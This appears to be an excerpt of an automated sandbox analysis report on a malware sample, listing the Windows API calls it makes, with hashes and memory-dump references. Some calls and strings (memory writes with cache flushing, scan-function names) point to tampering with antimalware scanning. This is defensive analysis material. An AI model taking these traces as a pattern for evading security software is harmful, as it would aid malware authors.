                                                                                                              • Opcode Fuzzy Hash: 0bda92ad237196620f1c68c9bf0df0886bb5b1a25cf4548c956cdb00e69bc576
                                                                                                              • Instruction Fuzzy Hash: 9E31A070E806149FDB00EFA9D881BEEB7F6AB09304F90D464E904AB380DB7559058FA1
                                                                                                              APIs
                                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02FBBA58), ref: 02E5F258
                                                                                                              • RegSetValueExA.ADVAPI32(00000594,00000000,00000000,00000001,00000000,0000001C,00000000,02E5F2C3), ref: 02E5F290
                                                                                                              • RegCloseKey.ADVAPI32(00000594,00000594,00000000,00000000,00000001,00000000,0000001C,00000000,02E5F2C3), ref: 02E5F29B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 779948276-0
                                                                                                              • Opcode ID: 88f6021505666f65b1521608fc5ba046bda713dfaad6465a4a2c1f1ce1ebd716
                                                                                                              • Instruction ID: 4ea3b88174cdabbada415dab09ab7506b9fd4242a7df8b459747433fb3c7f25c
                                                                                                              • Opcode Fuzzy Hash: 88f6021505666f65b1521608fc5ba046bda713dfaad6465a4a2c1f1ce1ebd716
                                                                                                              • Instruction Fuzzy Hash: 31113075B84208BFDB01EF68E881E9DB7EDEB0A740B40A461BA04D7690DF34DE009F54
                                                                                                              APIs
                                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02FBBA58), ref: 02E5F258
                                                                                                              • RegSetValueExA.ADVAPI32(00000594,00000000,00000000,00000001,00000000,0000001C,00000000,02E5F2C3), ref: 02E5F290
                                                                                                              • RegCloseKey.ADVAPI32(00000594,00000594,00000000,00000000,00000001,00000000,0000001C,00000000,02E5F2C3), ref: 02E5F29B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 779948276-0
                                                                                                              • Opcode ID: 7aa481b3bfedf242d3844c5e0b900d886b37357490a8665ea94f7e8357a197a9
                                                                                                              • Instruction ID: a82455e461d6ad0010b556a28639985b8367230e9179f6307da1f81a4a9c3c7b
                                                                                                              • Opcode Fuzzy Hash: 7aa481b3bfedf242d3844c5e0b900d886b37357490a8665ea94f7e8357a197a9
                                                                                                              • Instruction Fuzzy Hash: E1114275B84208BFDB01EF64E881E9DB7EDEB0A740F40A461BA04D7690DF34DA009F54
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClearVariant
                                                                                                              • String ID:
                                                                                                              • API String ID: 1473721057-0
                                                                                                              • Opcode ID: 721efa4d6c2dd680627b77164b13edf120d5b11f2c8e24ae2636d7f315e7b4fd
                                                                                                              • Instruction ID: 6ffcbb9817226e89f8f5de1126901c9d9e7c2f4386ef63f8eb289334f090e264
                                                                                                              • Opcode Fuzzy Hash: 721efa4d6c2dd680627b77164b13edf120d5b11f2c8e24ae2636d7f315e7b4fd
                                                                                                              • Instruction Fuzzy Hash: 42F0C2607C9110C78B267B39BC84AA9279A7F4034CB58F876B4069B205CF64CC45CB62
                                                                                                              APIs
                                                                                                              • SysFreeString.OLEAUT32(02E5F4A4), ref: 02E44C6E
                                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 02E44D5B
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02E44D6D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 986138563-0
                                                                                                              • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                              • Instruction ID: 5b555c9ac6f58f2e94433a509ea31f4479a3af533a299bba45e5797f6e6f8f74
                                                                                                              • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                              • Instruction Fuzzy Hash: 37E0ECB82852055EFE146F21B940B76222AAFC2784B18E499B804CE194DF389580AD3C
                                                                                                              APIs
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02E573DA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeString
                                                                                                              • String ID: H
                                                                                                              • API String ID: 3341692771-2852464175
                                                                                                              • Opcode ID: 44934a4d82a4b66548af012ee7b3ccaa6f5877b5b0bb3c3cd445c0aa4474fa05
                                                                                                              • Instruction ID: 1564cb9d29f48a793af2fe0a974be7dd80be32e41119049f396a3e45bdd925d4
                                                                                                              • Opcode Fuzzy Hash: 44934a4d82a4b66548af012ee7b3ccaa6f5877b5b0bb3c3cd445c0aa4474fa05
                                                                                                              • Instruction Fuzzy Hash: 61B1E178A516189FDB14CF99E480A9DFBF2FF89314F24D169E849AB320D730A855CF50
                                                                                                              APIs
                                                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 02E4E781
                                                                                                                • Part of subcall function 02E4E364: VariantClear.OLEAUT32(?), ref: 02E4E373
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearCopy
                                                                                                              • String ID:
                                                                                                              • API String ID: 274517740-0
                                                                                                              • Opcode ID: 5c17f1c356f31ba8e7bd50df0c94f8a1c926819f24e146e986dedefdd63f13c1
                                                                                                              • Instruction ID: cd185ed10c341ca2beb24ffdb2318ab9c858d0c96222017396ba3d2e927cc96e
                                                                                                              • Opcode Fuzzy Hash: 5c17f1c356f31ba8e7bd50df0c94f8a1c926819f24e146e986dedefdd63f13c1
                                                                                                              • Instruction Fuzzy Hash: AE11C62078021087CB34AF29F8C8E6637DABF8976471DF866F54A9B205DF30DC40CA61
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitVariant
                                                                                                              • String ID:
                                                                                                              • API String ID: 1927566239-0
                                                                                                              • Opcode ID: 7d2832f3665fe6f30531a2e757d1daf25d1d25c363f8c1926453e356e19e8814
                                                                                                              • Instruction ID: eb672dc183d66d846dc3fef316711f7fab39934c2bdba74b477c62c901348721
                                                                                                              • Opcode Fuzzy Hash: 7d2832f3665fe6f30531a2e757d1daf25d1d25c363f8c1926453e356e19e8814
                                                                                                              • Instruction Fuzzy Hash: A43157716802089FDB15DFA8E884AEE77F9FB0D318F989565F905D3140DB34D950CBA1
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                                • Part of subcall function 02E57D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC
                                                                                                                • Part of subcall function 02E58338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E583C2), ref: 02E583A4
                                                                                                              • FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 1478290883-0
                                                                                                              • Opcode ID: 9c8ff9c4414aac094719a0bc0050f759f833370c5d4b8c8d778eaee0e39d4f60
                                                                                                              • Instruction ID: 6c4e06a04a0564f5638cb93767555dcb73be1bb0a886639c0ec8815fe31a8233
                                                                                                              • Opcode Fuzzy Hash: 9c8ff9c4414aac094719a0bc0050f759f833370c5d4b8c8d778eaee0e39d4f60
                                                                                                              • Instruction Fuzzy Hash: 262145707D03007FEB40F7E9ED02B5DB79E9B45700F50E4A5BE04E7680DA74A9519E18
                                                                                                              APIs
                                                                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,02E56DB9,?,?,?,00000000), ref: 02E56D99
                                                                                                                • Part of subcall function 02E44C60: SysFreeString.OLEAUT32(02E5F4A4), ref: 02E44C6E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeFromProgString
                                                                                                              • String ID:
                                                                                                              • API String ID: 4225568880-0
                                                                                                              • Opcode ID: 92005d793704af550eb413f0c3d531a503386cb9aad6fbadbd999931e2b3f22f
                                                                                                              • Instruction ID: 4337e1398deae6e6ebaab14fa0344a32563d52d0f4b5773196b4564eafa3c144
                                                                                                              • Opcode Fuzzy Hash: 92005d793704af550eb413f0c3d531a503386cb9aad6fbadbd999931e2b3f22f
                                                                                                              • Instruction Fuzzy Hash: D7E0E5353906187BF311FB62EC41E8E77ADDB8B700BA198B1F90093550DE316E008960
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(02E40000,?,00000105), ref: 02E45886
                                                                                                                • Part of subcall function 02E45ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E40000,02E6E790), ref: 02E45AE8
                                                                                                                • Part of subcall function 02E45ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E40000,02E6E790), ref: 02E45B06
                                                                                                                • Part of subcall function 02E45ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E40000,02E6E790), ref: 02E45B24
                                                                                                                • Part of subcall function 02E45ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E45B42
                                                                                                                • Part of subcall function 02E45ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E45BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E45B8B
                                                                                                                • Part of subcall function 02E45ACC: RegQueryValueExA.ADVAPI32(?,02E45D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E45BD1,?,80000001), ref: 02E45BA9
                                                                                                                • Part of subcall function 02E45ACC: RegCloseKey.ADVAPI32(?,02E45BD8,00000000,?,?,00000000,02E45BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E45BCB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 2796650324-0
                                                                                                              • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                              • Instruction ID: 3100e23623208a2f671a438eb0139867a1f6d6865e0715c82474ff6be17ef3e3
                                                                                                              • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                              • Instruction Fuzzy Hash: 3CE06D71A403148FCB10DE98D8C0B4633D8AB08754F449961EC58CF346DBB0DD508BE0
                                                                                                              APIs
                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02E47DF4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                              • Instruction ID: 16beb8df71af4a83cf869469a3b11e0c23c5716355a39df0f78cefa6f2ab1a62
                                                                                                              • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                              • Instruction Fuzzy Hash: C2D05BB23492507BE224965A6D44EA75BDCCBC6770F10473DF558C7181D7208C01C6B1
                                                                                                              APIs
                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,02E6356F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,Initialize), ref: 02E47E8B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                              • Instruction ID: 8727584932c6cdd289f6f24eca7612cb31ee32a7583708388f180672899ef920
                                                                                                              • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                              • Instruction Fuzzy Hash: 1DC08CF23912010A1E60A6BC3CC421942C90985138760BF65F538DA2C1DF16DC222824
                                                                                                              APIs
                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,02E6041F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,UacInitialize), ref: 02E47E67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                              • Instruction ID: a40d13c7f135688bb70e4a6b5f158ced0aa31aa41f521529a9b7e02f311b410c
                                                                                                              • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                              • Instruction Fuzzy Hash: 71C08CF03812001A5A5066BC3CC424952CA090523C364BB65B538E62E2DF2298A22854
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeString
                                                                                                              • String ID:
                                                                                                              • API String ID: 3341692771-0
                                                                                                              • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                              • Instruction ID: e5d09e7dcc667ed24b6980dbf10222a8bae681cf421925112954a05f5d2a9dfc
                                                                                                              • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                              • Instruction Fuzzy Hash: A5C012A278023057FF215699BCC079262CC9B45298B1850A1A408DB290EB60990056A4
                                                                                                              APIs
                                                                                                              • timeSetEvent.WINMM(00002710,00000000,02E6C350,00000000,00000001), ref: 02E6C36C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Eventtime
                                                                                                              • String ID:
                                                                                                              • API String ID: 2982266575-0
                                                                                                              • Opcode ID: a15ecdcad71acb3597fdffa360b0522faeb741619125ff35ca14361a124e6f78
                                                                                                              • Instruction ID: 6621c9347dfb77b637dea4981ea03a9c17c3ad05b5aa184c83838a4822056bf6
                                                                                                              • Opcode Fuzzy Hash: a15ecdcad71acb3597fdffa360b0522faeb741619125ff35ca14361a124e6f78
                                                                                                              • Instruction Fuzzy Hash: 4FC02BF03C13003AFD0041609CC3F33118CC301740F207002B700EE1C1C1E348004E14
                                                                                                              APIs
                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02E44C3F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocString
                                                                                                              • String ID:
                                                                                                              • API String ID: 2525500382-0
